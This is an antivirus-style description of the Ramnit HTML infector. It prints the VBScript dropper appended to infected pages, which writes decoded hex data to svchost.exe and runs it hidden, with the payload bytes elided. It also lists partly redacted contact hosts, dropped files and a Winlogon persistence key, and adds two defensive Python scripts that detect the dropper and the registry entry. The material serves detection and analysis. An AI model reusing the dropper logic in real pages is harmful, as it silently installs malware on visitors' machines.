Virus Characteristics
----------Updated on April 01, 2013------------
Aliases
- Microsoft - Virus:VBS/Ramnit.gen!A
- Avira - HTML/Rce.Gen3
- Drweb - VBS.Rmnet.2
"W32/Ramnit.a!htm" is a detection for HTML files that have been infected by a virus. The source virus is detected as W32/Virut.gen.a.
"W32/Virut.gen.a" is a virus that infects exe, dll, html and scr files by injecting its own viral code. It may also spread via removable drives and mapped drives.
"W32/Ramnit.a!htm" is an infected .HTM or .HTML file which causes execution of another instance of the W32/Virut.gen.a virus.
The infected HTML files have an appended VBScript. When the user opens the infected HTML file, the VBScript drops a copy of the W32/Ramnit file into the below mentioned location.
Below is the VBScript added to the source of all the HTML files on the compromised machine.
    <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    ' Hex-encoded executable; the actual bytes are elided in this description
    WriteData =[Binary Data]
    Set FSO = CreateObject("Scripting.FileSystemObject")
    ' GetSpecialFolder(2) is the user's temporary folder
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    ' Decode two hex digits at a time into the dropped file
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    ' Run the dropped file with a hidden window
    WSHshell.Run DropPath, 0
    //--></SCRIPT> <!--[Content removed]-->
The above is the malicious VBScript written by the virus: it drops a file named svchost.exe, writes the decoded binary data into it, and then executes it.
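As an added example (not McAfee's code, and not part of the original description), the following Python scanner looks for the dropper pattern shown above inside an HTML file and recovers the embedded payload for hashing, mirroring the script's own two-hex-digits-per-byte decode loop. It assumes the dropper keeps the shape shown above, with the payload stored as a quoted hex string in WriteData (the page elides that value as [Binary Data]); the sample HTML and its 8-byte stub payload are constructed here and are not real malware.

```python
"""Detect a Ramnit-style VBScript dropper appended to an HTML file and
recover the hex-encoded payload so it can be hashed and triaged."""
import hashlib
import re
from typing import Optional

# Markers taken from the script shown above; all three must be present.
MARKERS = (
    'CreateObject("Scripting.FileSystemObject")',
    "FSO.GetSpecialFolder(2)",  # 2 = the user's temporary folder
    'CreateObject("WScript.Shell")',
)
SCRIPT_RE = re.compile(r"<SCRIPT\s+Language=VBScript>(.*?)</SCRIPT>",
                       re.IGNORECASE | re.DOTALL)
DROPNAME_RE = re.compile(r'DropFileName\s*=\s*"([^"]*)"', re.IGNORECASE)
# Assumption: the payload is a quoted hex literal, e.g. WriteData = "4D5A..."
WRITEDATA_RE = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]*)"', re.IGNORECASE)


def decode_writedata(hexdata: str) -> bytes:
    """Replicate the 'For i = 1 To Len(WriteData) Step 2' loop: each slice of
    two hex digits becomes one byte. A trailing single digit still becomes
    a byte, exactly as Mid(...,i,2) returns one character at the end."""
    out = bytearray()
    for i in range(0, len(hexdata), 2):
        out.append(int(hexdata[i:i + 2], 16))
    return bytes(out)


def scan_html(text: str) -> Optional[dict]:
    """Return details of an appended VBScript dropper, or None if the
    document carries no script with all of the marker strings."""
    lowered = text.lower()
    html_end = lowered.rfind("</html>")
    for m in SCRIPT_RE.finditer(text):
        body = m.group(1)
        if not all(marker.lower() in body.lower() for marker in MARKERS):
            continue
        drop = DROPNAME_RE.search(body)
        data = WRITEDATA_RE.search(body)
        payload = decode_writedata(data.group(1)) if data else b""
        return {
            "drop_file_name": drop.group(1) if drop else None,
            # The infection pattern is a script appended after </HTML>.
            "appended_after_html": html_end != -1 and m.start() > html_end,
            "payload_size": len(payload),
            "payload_sha256": hashlib.sha256(payload).hexdigest(),
            "payload_is_pe": payload[:2] == b"MZ",
        }
    return None


# Constructed sample: a benign page with the dropper appended after </HTML>.
# The payload is a made-up 8-byte stub, not a real executable.
SAMPLE_INFECTED = (
    "<HTML><BODY>hello</BODY></HTML>\n"
    "<SCRIPT Language=VBScript><!--\n"
    'DropFileName = "svchost.exe"\n'
    'WriteData = "4D5A900003000000"\n'
    'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
    'DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName\n'
    "If FSO.FileExists(DropPath)=False Then\n"
    "Set FileObj = FSO.CreateTextFile(DropPath, True)\n"
    "For i = 1 To Len(WriteData) Step 2\n"
    'FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))\n'
    "Next\nFileObj.Close\nEnd If\n"
    'Set WSHshell = CreateObject("WScript.Shell")\n'
    "WSHshell.Run DropPath, 0\n"
    "//--></SCRIPT>\n"
)
# Constructed clean page: an inline VBScript without the dropper markers.
SAMPLE_CLEAN = '<HTML><BODY><SCRIPT Language=VBScript>MsgBox "hi"</SCRIPT></BODY></HTML>\n'

if __name__ == "__main__":
    print(scan_html(SAMPLE_INFECTED))
    print(scan_html(SAMPLE_CLEAN))
```

The three marker strings are deliberately required together: FileSystemObject or WScript.Shell alone appear in legitimate intranet pages, while the combination with GetSpecialFolder(2) in a script placed after the closing HTML tag is the pattern this description documents. The recovered payload hash can then be matched against the dropped-file hashes an AV or sandbox reports.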
---------------------------------------------------------------------------
---------Updated on May 17th, 2012---------------------
Aliases
- Kaspersky - Trojan-Dropper.VBS.Agent.bp
- NOD32 - Win32/Ramnit.A
- Ikarus - Virus.VBS.Ramnit
- Microsoft - Virus:VBS/Ramnit.B
W32/Ramnit.a!htm is the detection for this Trojan, which contains a malicious VBScript. When the infected HTML file is opened, it drops a malicious file on the user's system.
Once the infected HTML file is opened, it drops a file into the following location and executes it:
Once svchost.exe is executed, it tries to connect to the following URLs through remote port 443:
- 91.220.[Removed].30
- rterybrst[Removed]erve.com
And it drops the following files:
- %Windir%\system32\dllcache\vgx.dll
- %Windir%\system32\dmlconf.dat
- %userprofile%\Desktop\svchostmgr.exe
- %Programfiles%\Common Files\Microsoft Shared\VGX\vgx.dll
- %Programfiles%\Common Files\System\msadc\OLD128.tmp
- %Programfiles%\Windows Media Player\OLD12B.tmp
- %Programfiles%\Microsoft\WaterMark.exe
The following registry key has been added:
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\]
"Userinit" = "%Windir%\system32\userinit.exe,, %Programfiles% \microsoft\watermark.exe"
The registry entry above ensures that the Trojan is registered with the compromised system and executes on every boot.
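As an added example (not McAfee's code and not part of the original description), the following Python helper checks a Winlogon Userinit value for entries other than the stock userinit.exe, which is how the persistence entry above shows up. It assumes the legitimate value is a single userinit.exe entry followed by a trailing comma; the sample values are constructed here, with the infected one taken from the registry line shown above.

```python
"""Flag extra entries in the Winlogon Userinit value (Ramnit persistence)."""
import re
import sys
from typing import List

# The stock entry, written either with %Windir% or an expanded drive path.
LEGIT_USERINIT = re.compile(
    r"^(%windir%|[a-z]:\\windows)\\system32\\userinit\.exe$", re.IGNORECASE
)


def extra_userinit_entries(value: str) -> List[str]:
    """Split a Userinit value on commas and return every entry that is not
    the stock userinit.exe. Empty entries (from ',,' or the trailing comma
    Windows itself writes) are ignored, so a clean value yields []."""
    extras = []
    for raw in value.split(","):
        entry = raw.strip().strip('"')
        if not entry or LEGIT_USERINIT.match(entry):
            continue
        extras.append(entry)
    return extras


def read_live_userinit() -> str:
    """Read the live value. Assumption: called on Windows with read access
    to HKLM; winreg is a Windows-only module."""
    import winreg
    key = winreg.OpenKey(
        winreg.HKEY_LOCAL_MACHINE,
        r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
    )
    try:
        value, _ = winreg.QueryValueEx(key, "Userinit")
        return value
    finally:
        winreg.CloseKey(key)


# Constructed samples: the value documented above, and a clean one.
INFECTED_VALUE = r"%Windir%\system32\userinit.exe,, %Programfiles% \microsoft\watermark.exe"
CLEAN_VALUE = r"C:\Windows\system32\userinit.exe,"

if __name__ == "__main__":
    value = read_live_userinit() if sys.platform == "win32" else INFECTED_VALUE
    for entry in extra_userinit_entries(value):
        print("unexpected Userinit entry:", entry)
```

Any entry returned here runs under the user's session at every logon, so each one should be checked against the dropped-file list above and hashed; removing the extra entry without also removing the dropped files leaves the HTML infection in place to re-drop them.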
------------------------------------------------------------------------------------------------------
"W32/Ramnit" is a virus that infects the HTML document files with ".HTML" or ".HTM" extension.
"W32/Ramnit.a!htm" is a generic detection for .html files which are infected with the W32/Ramnit virus; the infected HTML files are detected by McAfee as W32/Ramnit.a!htm.
The infected HTML files have an appended VBScript. When the user opens the infected HTML file, the VBScript drops a copy of W32/Ramnit file into the below mentioned location.
The dropped file "svchost.exe" is then executed.